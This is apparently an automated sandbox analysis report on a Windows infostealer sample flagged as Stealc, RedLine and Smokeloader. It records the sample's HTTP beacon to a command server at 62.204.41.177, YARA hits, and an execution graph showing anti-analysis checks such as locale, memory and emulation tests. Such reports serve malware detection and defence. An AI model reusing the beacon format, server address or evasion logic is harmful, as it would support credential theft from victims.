                                                Oct 26, 2024 00:58:57.615580082 CEST804969962.204.41.177192.168.2.7
                                                Oct 26, 2024 00:58:57.615782022 CEST4969980192.168.2.762.204.41.177
                                                Oct 26, 2024 00:59:21.470489979 CEST4969980192.168.2.762.204.41.177
                                                • 62.204.41.177
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.74969962.204.41.1778060C:\Users\user\Desktop\cdc57Mn7dE.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 26, 2024 00:58:50.293545961 CEST88OUTGET / HTTP/1.1
                                                Host: 62.204.41.177
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 26, 2024 00:58:51.176397085 CEST203INHTTP/1.1 200 OK
                                                Date: Fri, 25 Oct 2024 22:58:51 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 0
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Oct 26, 2024 00:58:51.183470964 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD
                                                Host: 62.204.41.177
                                                Content-Length: 219
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 36 30 38 45 46 41 44 44 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 2d 2d 0d 0a
                                                Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="hwid"AA608EFADD6D3392259749------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="build"default9_cap------AKEBFCFIJJKKECAKJEHD--
                                                Oct 26, 2024 00:58:52.462999105 CEST210INHTTP/1.1 200 OK
                                                Date: Fri, 25 Oct 2024 22:58:51 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 8
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                Data Ascii: YmxvY2s=


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:18:58:44
                                                Start date:25/10/2024
                                                Path:C:\Users\user\Desktop\cdc57Mn7dE.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\cdc57Mn7dE.exe"
                                                Imagebase:0x400000
                                                File size:352'768 bytes
                                                MD5 hash:07F591A17C73AF012377A73B06A11B66
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1585344301.000000000083B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1268758172.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:15
                                                Start time:18:58:52
                                                Start date:25/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 1180
                                                Imagebase:0x9b0000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:7%
                                                  Dynamic/Decrypted Code Coverage:4.8%
                                                  Signature Coverage:12.2%
                                                  Total number of Nodes:1416
                                                  Total number of Limit Nodes:28
                                                  execution_graph 27636 409440 strlen malloc strcpy_s free std::exception::exception 27637 b304b7 88 API calls 27638 b30cb6 30 API calls 27707 41ce48 LeaveCriticalSection __initptd 27709 b26ebc VirtualProtect 27639 41b050 6 API calls 3 library calls 27678 b3cd90 173 API calls 3 library calls 27642 b3d0af RtlLeaveCriticalSection __mtinitlocknum 27710 b332ae 22 API calls 27711 b3ae93 43 API calls ctype 27742 406f60 memcpy 27643 41dc60 atexit 27712 b30297 149 API calls 27743 410765 279 API calls 27713 417667 lstrcpy 27715 41b270 5 API calls 2 library calls 27644 b33823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27680 b3118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27681 b3cd8f 6 API calls 2 library calls 27646 b3102b StrCmpCA strtok_s 27648 b330f9 7 API calls 27649 41bc11 71 API calls 2 library calls 27687 b319e7 6 API calls 27688 b335e4 9 API calls 27651 b3cce9 162 API calls getSystemCP 27652 b330d0 9 API calls 27655 b33823 10 API calls 27656 41ac2c 71 API calls 2 library calls 27746 b313c7 strtok_s strtok_s 27658 b3102b StrCmpCA StrCmpCA strtok_s 27660 4090c3 5 API calls allocator 27748 b29b37 9 API calls 27662 b31c35 110 API calls 27750 41abd0 free codecvt std::exception::_Tidy 27692 b31525 strtok_s strtok_s lstrlen lstrcpy ctype 27751 b2932a ??2@YAPAXI RaiseException allocator 27752 413916 91 API calls 2 library calls 27754 4183dc 15 API calls 27727 b315b3 18 API calls ctype 27666 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27729 41ceea SetUnhandledExceptionFilter 27756 b312eb strtok_s lstrlen lstrcpy 26178 4169f0 26221 402260 26178->26221 26195 417850 3 API calls 26196 416a30 26195->26196 26197 4178e0 3 API calls 26196->26197 26198 416a43 26197->26198 26354 41a9b0 26198->26354 26200 416a64 26201 41a9b0 4 API calls 26200->26201 26202 416a6b 26201->26202 26203 41a9b0 4 API calls 26202->26203 26204 416a72 26203->26204 26205 41a9b0 4 API calls 26204->26205 26206 416a79 26205->26206 26207 41a9b0 4 API calls 26206->26207 26208 416a80 26207->26208 26362 41a8a0 26208->26362 26210 416b0c 26366 416920 GetSystemTime 26210->26366 26211 416a89 26211->26210 26213 416ac2 OpenEventA 26211->26213 26215 416af5 CloseHandle Sleep 26213->26215 26216 416ad9 26213->26216 26218 416b0a 26215->26218 26220 416ae1 CreateEventA 26216->26220 26218->26211 26219 416b16 CloseHandle ExitProcess 26220->26210 26563 4045c0 17 API calls 26221->26563 26223 402274 26224 4045c0 34 API calls 26223->26224 26225 40228d 26224->26225 26226 4045c0 34 API calls 26225->26226 26227 4022a6 26226->26227 26228 4045c0 34 API calls 26227->26228 26229 4022bf 26228->26229 26230 4045c0 34 API calls 26229->26230 26231 4022d8 26230->26231 26232 4045c0 34 API calls 26231->26232 26233 4022f1 26232->26233 26234 4045c0 34 API calls 26233->26234 26235 40230a 26234->26235 26236 4045c0 34 API calls 26235->26236 26237 402323 26236->26237 26238 4045c0 34 API calls 26237->26238 26239 40233c 26238->26239 26240 4045c0 34 API calls 26239->26240 26241 402355 26240->26241 26242 4045c0 34 API calls 26241->26242 26243 40236e 26242->26243 26244 4045c0 34 API calls 26243->26244 26245 402387 26244->26245 26246 4045c0 34 API calls 26245->26246 26247 4023a0 26246->26247 26248 4045c0 34 API calls 26247->26248 26249 4023b9 26248->26249 26250 4045c0 34 API calls 26249->26250 26251 4023d2 26250->26251 26252 4045c0 34 API calls 26251->26252 26253 4023eb 26252->26253 26254 4045c0 34 API calls 26253->26254 26255 402404 26254->26255 26256 4045c0 34 API calls 26255->26256 26257 40241d 26256->26257 26258 4045c0 34 API calls 26257->26258 26259 402436 26258->26259 26260 4045c0 34 API calls 26259->26260 26261 40244f 26260->26261 26262 4045c0 34 API calls 26261->26262 26263 402468 26262->26263 26264 4045c0 34 API calls 26263->26264 26265 402481 26264->26265 26266 4045c0 34 API calls 26265->26266 26267 40249a 26266->26267 26268 4045c0 34 API calls 26267->26268 26269 4024b3 26268->26269 26270 4045c0 34 API calls 26269->26270 26271 4024cc 26270->26271 26272 4045c0 34 API calls 26271->26272 26273 4024e5 26272->26273 26274 4045c0 34 API calls 26273->26274 26275 4024fe 26274->26275 26276 4045c0 34 API calls 26275->26276 26277 402517 26276->26277 26278 4045c0 34 API calls 26277->26278 26279 402530 26278->26279 26280 4045c0 34 API calls 26279->26280 26281 402549 26280->26281 26282 4045c0 34 API calls 26281->26282 26283 402562 26282->26283 26284 4045c0 34 API calls 26283->26284 26285 40257b 26284->26285 26286 4045c0 34 API calls 26285->26286 26287 402594 26286->26287 26288 4045c0 34 API calls 26287->26288 26289 4025ad 26288->26289 26290 4045c0 34 API calls 26289->26290 26291 4025c6 26290->26291 26292 4045c0 34 API calls 26291->26292 26293 4025df 26292->26293 26294 4045c0 34 API calls 26293->26294 26295 4025f8 26294->26295 26296 4045c0 34 API calls 26295->26296 26297 402611 26296->26297 26298 4045c0 34 API calls 26297->26298 26299 40262a 26298->26299 26300 4045c0 34 API calls 26299->26300 26301 402643 26300->26301 26302 4045c0 34 API calls 26301->26302 26303 40265c 26302->26303 26304 4045c0 34 API calls 26303->26304 26305 402675 26304->26305 26306 4045c0 34 API calls 26305->26306 26307 40268e 26306->26307 26308 419860 26307->26308 26567 419750 GetPEB 26308->26567 26310 419868 26311 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26310->26311 26312 41987a 26310->26312 26313 419af4 GetProcAddress 26311->26313 26314 419b0d 26311->26314 26315 41988c 21 API calls 26312->26315 26313->26314 26316 419b46 26314->26316 26317 419b16 GetProcAddress GetProcAddress 26314->26317 26315->26311 26318 419b68 26316->26318 26319 419b4f GetProcAddress 26316->26319 26317->26316 26320 419b71 GetProcAddress 26318->26320 26321 419b89 26318->26321 26319->26318 26320->26321 26322 416a00 26321->26322 26323 419b92 GetProcAddress GetProcAddress 26321->26323 26324 41a740 26322->26324 26323->26322 26325 41a750 26324->26325 26326 416a0d 26325->26326 26327 41a77e lstrcpy 26325->26327 26328 4011d0 26326->26328 26327->26326 26329 4011e8 26328->26329 26330 401217 26329->26330 26331 40120f ExitProcess 26329->26331 26332 401160 GetSystemInfo 26330->26332 26333 401184 26332->26333 26334 40117c ExitProcess 26332->26334 26335 401110 GetCurrentProcess VirtualAllocExNuma 26333->26335 26336 401141 ExitProcess 26335->26336 26337 401149 26335->26337 26568 4010a0 VirtualAlloc 26337->26568 26340 401220 26572 4189b0 26340->26572 26343 401249 __aulldiv 26344 40129a 26343->26344 26345 401292 ExitProcess 26343->26345 26346 416770 GetUserDefaultLangID 26344->26346 26347 4167d3 GetUserDefaultLCID 26346->26347 26348 416792 26346->26348 26347->26195 26348->26347 26349 4167c1 ExitProcess 26348->26349 26350 4167a3 ExitProcess 26348->26350 26351 4167b7 ExitProcess 26348->26351 26352 4167cb ExitProcess 26348->26352 26353 4167ad ExitProcess 26348->26353 26574 41a710 26354->26574 26356 41a9c1 lstrlenA 26358 41a9e0 26356->26358 26357 41aa18 26575 41a7a0 26357->26575 26358->26357 26360 41a9fa lstrcpy lstrcatA 26358->26360 26360->26357 26361 41aa24 26361->26200 26363 41a8bb 26362->26363 26364 41a90b 26363->26364 26365 41a8f9 lstrcpy 26363->26365 26364->26211 26365->26364 26579 416820 26366->26579 26368 41698e 26369 416998 sscanf 26368->26369 26608 41a800 26369->26608 26371 4169aa SystemTimeToFileTime SystemTimeToFileTime 26372 4169e0 26371->26372 26373 4169ce 26371->26373 26375 415b10 26372->26375 26373->26372 26374 4169d8 ExitProcess 26373->26374 26376 415b1d 26375->26376 26377 41a740 lstrcpy 26376->26377 26378 415b2e 26377->26378 26610 41a820 lstrlenA 26378->26610 26381 41a820 2 API calls 26382 415b64 26381->26382 26383 41a820 2 API calls 26382->26383 26384 415b74 26383->26384 26614 416430 26384->26614 26387 41a820 2 API calls 26388 415b93 26387->26388 26389 41a820 2 API calls 26388->26389 26390 415ba0 26389->26390 26391 41a820 2 API calls 26390->26391 26392 415bad 26391->26392 26393 41a820 2 API calls 26392->26393 26394 415bf9 26393->26394 26623 4026a0 26394->26623 26402 415cc3 26403 416430 lstrcpy 26402->26403 26404 415cd5 26403->26404 26405 41a7a0 lstrcpy 26404->26405 26406 415cf2 26405->26406 26407 41a9b0 4 API calls 26406->26407 26408 415d0a 26407->26408 26409 41a8a0 lstrcpy 26408->26409 26410 415d16 26409->26410 26411 41a9b0 4 API calls 26410->26411 26412 415d3a 26411->26412 26413 41a8a0 lstrcpy 26412->26413 26414 415d46 26413->26414 26415 41a9b0 4 API calls 26414->26415 26416 415d6a 26415->26416 26417 41a8a0 lstrcpy 26416->26417 26418 415d76 26417->26418 26419 41a740 lstrcpy 26418->26419 26420 415d9e 26419->26420 27349 417500 GetWindowsDirectoryA 26420->27349 26423 41a7a0 lstrcpy 26424 415db8 26423->26424 27359 404880 26424->27359 26426 415dbe 27505 4117a0 26426->27505 26428 415dc6 26429 41a740 lstrcpy 26428->26429 26430 415de9 26429->26430 26431 401590 lstrcpy 26430->26431 26432 415dfd 26431->26432 27525 405960 39 API calls codecvt 26432->27525 26434 415e03 27526 411050 strtok_s strtok_s lstrlenA lstrcpy 26434->27526 26436 415e0e 26437 41a740 lstrcpy 26436->26437 26438 415e32 26437->26438 26439 401590 lstrcpy 26438->26439 26440 415e46 26439->26440 27527 405960 39 API calls codecvt 26440->27527 26442 415e4c 27528 410d90 7 API calls 26442->27528 26444 415e57 26445 41a740 lstrcpy 26444->26445 26446 415e79 26445->26446 26447 401590 lstrcpy 26446->26447 26448 415e8d 26447->26448 27529 405960 39 API calls codecvt 26448->27529 26450 415e93 27530 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26450->27530 26452 415e9e 26453 401590 lstrcpy 26452->26453 26454 415eb5 26453->26454 27531 411a10 121 API calls 26454->27531 26456 415eba 26457 41a740 lstrcpy 26456->26457 26458 415ed6 26457->26458 27532 404fb0 8 API calls 26458->27532 26460 415edb 26461 401590 lstrcpy 26460->26461 26462 415f5b 26461->26462 27533 410740 292 API calls 26462->27533 26464 415f60 26465 41a740 lstrcpy 26464->26465 26466 415f86 26465->26466 26467 401590 lstrcpy 26466->26467 26468 415f9a 26467->26468 27534 405960 39 API calls codecvt 26468->27534 26470 415fa0 27535 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26470->27535 26472 415fab 26473 401590 lstrcpy 26472->26473 26474 415feb 26473->26474 27536 401e80 67 API calls 26474->27536 26476 415ff0 26477 416000 26476->26477 26478 416092 26476->26478 26480 41a740 lstrcpy 26477->26480 26479 41a7a0 lstrcpy 26478->26479 26482 4160a5 26479->26482 26481 416020 26480->26481 26483 401590 lstrcpy 26481->26483 26484 401590 lstrcpy 26482->26484 26485 416034 26483->26485 26486 4160b9 26484->26486 27537 405960 39 API calls codecvt 26485->27537 27540 405960 39 API calls codecvt 26486->27540 26489 4160bf 27541 413560 36 API calls 26489->27541 26490 41603a 27538 4112d0 21 API calls codecvt 26490->27538 26493 41608a 26497 401590 lstrcpy 26493->26497 26531 41610b 26493->26531 26494 416045 26495 401590 lstrcpy 26494->26495 26496 416085 26495->26496 27539 413dc0 75 API calls 26496->27539 26500 4160e7 26497->26500 26499 401590 lstrcpy 26501 41612b 26499->26501 27542 4140b0 64 API calls codecvt 26500->27542 27544 414780 116 API calls codecvt 26501->27544 26502 401590 lstrcpy 26505 416150 26502->26505 27545 414bb0 67 API calls codecvt 26505->27545 26506 4160ec 26513 401590 lstrcpy 26506->26513 26507 401590 lstrcpy 26514 416175 26507->26514 26508 401590 lstrcpy 26515 41619a 26508->26515 26509 416130 26509->26502 26517 416155 26509->26517 26510 41619f 26511 4161c4 26510->26511 26516 401590 lstrcpy 26510->26516 26519 4161e9 26511->26519 26525 401590 lstrcpy 26511->26525 26518 416106 26513->26518 27546 414d70 75 API calls 26514->27546 27547 414f40 69 API calls codecvt 26515->27547 26523 4161bf 26516->26523 26517->26507 26526 41617a 26517->26526 27543 415100 71 API calls 26518->27543 26521 416210 26519->26521 26527 401590 lstrcpy 26519->26527 26528 416220 26521->26528 26529 4162b3 26521->26529 27548 407710 125 API calls codecvt 26523->27548 26532 4161e4 26525->26532 26526->26508 26526->26510 26534 416209 26527->26534 26536 41a740 lstrcpy 26528->26536 26535 41a7a0 lstrcpy 26529->26535 26531->26499 26531->26509 27549 415050 67 API calls codecvt 26532->27549 27550 419010 54 API calls codecvt 26534->27550 26538 4162c6 26535->26538 26539 416241 26536->26539 26540 401590 lstrcpy 26538->26540 26541 401590 lstrcpy 26539->26541 26542 4162da 26540->26542 26543 416255 26541->26543 27554 405960 39 API calls codecvt 26542->27554 27551 405960 39 API calls codecvt 26543->27551 26546 4162e0 27555 413560 36 API calls 26546->27555 26547 41625b 27552 4112d0 21 API calls codecvt 26547->27552 26550 416266 26552 401590 lstrcpy 26550->26552 26551 4162ab 26553 41a7a0 lstrcpy 26551->26553 26554 4162a6 26552->26554 26555 4162fc 26553->26555 27553 413dc0 75 API calls 26554->27553 26557 401590 lstrcpy 26555->26557 26558 416310 26557->26558 27556 405960 39 API calls codecvt 26558->27556 26560 41631c 26562 416338 26560->26562 27557 416630 9 API calls codecvt 26560->27557 26562->26219 26566 404697 26563->26566 26564 4046ac 11 API calls 26564->26566 26565 40474f 6 API calls 26565->26223 26566->26564 26566->26565 26567->26310 26569 4010c2 codecvt 26568->26569 26570 4010fd 26569->26570 26571 4010e2 VirtualFree 26569->26571 26570->26340 26571->26570 26573 401233 GlobalMemoryStatusEx 26572->26573 26573->26343 26574->26356 26576 41a7c2 26575->26576 26577 41a7ec 26576->26577 26578 41a7da lstrcpy 26576->26578 26577->26361 26578->26577 26580 41a740 lstrcpy 26579->26580 26581 416833 26580->26581 26582 41a9b0 4 API calls 26581->26582 26583 416845 26582->26583 26584 41a8a0 lstrcpy 26583->26584 26585 41684e 26584->26585 26586 41a9b0 4 API calls 26585->26586 26587 416867 26586->26587 26588 41a8a0 lstrcpy 26587->26588 26589 416870 26588->26589 26590 41a9b0 4 API calls 26589->26590 26591 41688a 26590->26591 26592 41a8a0 lstrcpy 26591->26592 26593 416893 26592->26593 26594 41a9b0 4 API calls 26593->26594 26595 4168ac 26594->26595 26596 41a8a0 lstrcpy 26595->26596 26597 4168b5 26596->26597 26598 41a9b0 4 API calls 26597->26598 26599 4168cf 26598->26599 26600 41a8a0 lstrcpy 26599->26600 26601 4168d8 26600->26601 26602 41a9b0 4 API calls 26601->26602 26603 4168f3 26602->26603 26604 41a8a0 lstrcpy 26603->26604 26605 4168fc 26604->26605 26606 41a7a0 lstrcpy 26605->26606 26607 416910 26606->26607 26607->26368 26609 41a812 26608->26609 26609->26371 26611 41a83f 26610->26611 26612 415b54 26611->26612 26613 41a87b lstrcpy 26611->26613 26612->26381 26613->26612 26615 41a8a0 lstrcpy 26614->26615 26616 416443 26615->26616 26617 41a8a0 lstrcpy 26616->26617 26618 416455 26617->26618 26619 41a8a0 lstrcpy 26618->26619 26620 416467 26619->26620 26621 41a8a0 lstrcpy 26620->26621 26622 415b86 26621->26622 26622->26387 26624 4045c0 34 API calls 26623->26624 26625 4026b4 26624->26625 26626 4045c0 34 API calls 26625->26626 26627 4026d7 26626->26627 26628 4045c0 34 API calls 26627->26628 26629 4026f0 26628->26629 26630 4045c0 34 API calls 26629->26630 26631 402709 26630->26631 26632 4045c0 34 API calls 26631->26632 26633 402736 26632->26633 26634 4045c0 34 API calls 26633->26634 26635 40274f 26634->26635 26636 4045c0 34 API calls 26635->26636 26637 402768 26636->26637 26638 4045c0 34 API calls 26637->26638 26639 402795 26638->26639 26640 4045c0 34 API calls 26639->26640 26641 4027ae 26640->26641 26642 4045c0 34 API calls 26641->26642 26643 4027c7 26642->26643 26644 4045c0 34 API calls 26643->26644 26645 4027e0 26644->26645 26646 4045c0 34 API calls 26645->26646 26647 4027f9 26646->26647 26648 4045c0 34 API calls 26647->26648 26649 402812 26648->26649 26650 4045c0 34 API calls 26649->26650 26651 40282b 26650->26651 26652 4045c0 34 API calls 26651->26652 26653 402844 26652->26653 26654 4045c0 34 API calls 26653->26654 26655 40285d 26654->26655 26656 4045c0 34 API calls 26655->26656 26657 402876 26656->26657 26658 4045c0 34 API calls 26657->26658 26659 40288f 26658->26659 26660 4045c0 34 API calls 26659->26660 26661 4028a8 26660->26661 26662 4045c0 34 API calls 26661->26662 26663 4028c1 26662->26663 26664 4045c0 34 API calls 26663->26664 26665 4028da 26664->26665 26666 4045c0 34 API calls 26665->26666 26667 4028f3 26666->26667 26668 4045c0 34 API calls 26667->26668 26669 40290c 26668->26669 26670 4045c0 34 API calls 26669->26670 26671 402925 26670->26671 26672 4045c0 34 API calls 26671->26672 26673 40293e 26672->26673 26674 4045c0 34 API calls 26673->26674 26675 402957 26674->26675 26676 4045c0 34 API calls 26675->26676 26677 402970 26676->26677 26678 4045c0 34 API calls 26677->26678 26679 402989 26678->26679 26680 4045c0 34 API calls 26679->26680 26681 4029a2 26680->26681 26682 4045c0 34 API calls 26681->26682 26683 4029bb 26682->26683 26684 4045c0 34 API calls 26683->26684 26685 4029d4 26684->26685 26686 4045c0 34 API calls 26685->26686 26687 4029ed 26686->26687 26688 4045c0 34 API calls 26687->26688 26689 402a06 26688->26689 26690 4045c0 34 API calls 26689->26690 26691 402a1f 26690->26691 26692 4045c0 34 API calls 26691->26692 26693 402a38 26692->26693 26694 4045c0 34 API calls 26693->26694 26695 402a51 26694->26695 26696 4045c0 34 API calls 26695->26696 26697 402a6a 26696->26697 26698 4045c0 34 API calls 26697->26698 26699 402a83 26698->26699 26700 4045c0 34 API calls 26699->26700 26701 402a9c 26700->26701 26702 4045c0 34 API calls 26701->26702 26703 402ab5 26702->26703 26704 4045c0 34 API calls 26703->26704 26705 402ace 26704->26705 26706 4045c0 34 API calls 26705->26706 26707 402ae7 26706->26707 26708 4045c0 34 API calls 26707->26708 26709 402b00 26708->26709 26710 4045c0 34 API calls 26709->26710 26711 402b19 26710->26711 26712 4045c0 34 API calls 26711->26712 26713 402b32 26712->26713 26714 4045c0 34 API calls 26713->26714 26715 402b4b 26714->26715 26716 4045c0 34 API calls 26715->26716 26717 402b64 26716->26717 26718 4045c0 34 API calls 26717->26718 26719 402b7d 26718->26719 26720 4045c0 34 API calls 26719->26720 26721 402b96 26720->26721 26722 4045c0 34 API calls 26721->26722 26723 402baf 26722->26723 26724 4045c0 34 API calls 26723->26724 26725 402bc8 26724->26725 26726 4045c0 34 API calls 26725->26726 26727 402be1 26726->26727 26728 4045c0 34 API calls 26727->26728 26729 402bfa 26728->26729 26730 4045c0 34 API calls 26729->26730 26731 402c13 26730->26731 26732 4045c0 34 API calls 26731->26732 26733 402c2c 26732->26733 26734 4045c0 34 API calls 26733->26734 26735 402c45 26734->26735 26736 4045c0 34 API calls 26735->26736 26737 402c5e 26736->26737 26738 4045c0 34 API calls 26737->26738 26739 402c77 26738->26739 26740 4045c0 34 API calls 26739->26740 26741 402c90 26740->26741 26742 4045c0 34 API calls 26741->26742 26743 402ca9 26742->26743 26744 4045c0 34 API calls 26743->26744 26745 402cc2 26744->26745 26746 4045c0 34 API calls 26745->26746 26747 402cdb 26746->26747 26748 4045c0 34 API calls 26747->26748 26749 402cf4 26748->26749 26750 4045c0 34 API calls 26749->26750 26751 402d0d 26750->26751 26752 4045c0 34 API calls 26751->26752 26753 402d26 26752->26753 26754 4045c0 34 API calls 26753->26754 26755 402d3f 26754->26755 26756 4045c0 34 API calls 26755->26756 26757 402d58 26756->26757 26758 4045c0 34 API calls 26757->26758 26759 402d71 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 402d8a 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 402da3 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 402dbc 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 402dd5 26766->26767 26768 4045c0 34 API calls 26767->26768 26769 402dee 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 402e07 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 402e20 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 402e39 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 402e52 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 402e6b 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 402e84 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 402e9d 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 402eb6 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 402ecf 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 402ee8 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 402f01 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 402f1a 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 402f33 26794->26795 26796 4045c0 34 API calls 26795->26796 26797 402f4c 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 402f65 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 402f7e 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 402f97 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 402fb0 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 402fc9 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 402fe2 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 402ffb 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 403014 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 40302d 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 403046 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 40305f 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 403078 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 403091 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 4030aa 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 4030c3 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 4030dc 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 4030f5 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 40310e 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 403127 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 403140 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 403159 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 403172 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 40318b 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 4031a4 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 4031bd 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 4031d6 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 4031ef 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 403208 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 403221 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 40323a 26856->26857 26858 4045c0 34 API calls 26857->26858 26859 403253 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 40326c 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 403285 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 40329e 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 4032b7 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 4032d0 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 4032e9 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 403302 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 40331b 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 403334 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 40334d 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 403366 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 40337f 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 403398 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 4033b1 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 4033ca 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 4033e3 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 4033fc 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 403415 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 40342e 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 403447 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 403460 26900->26901 26902 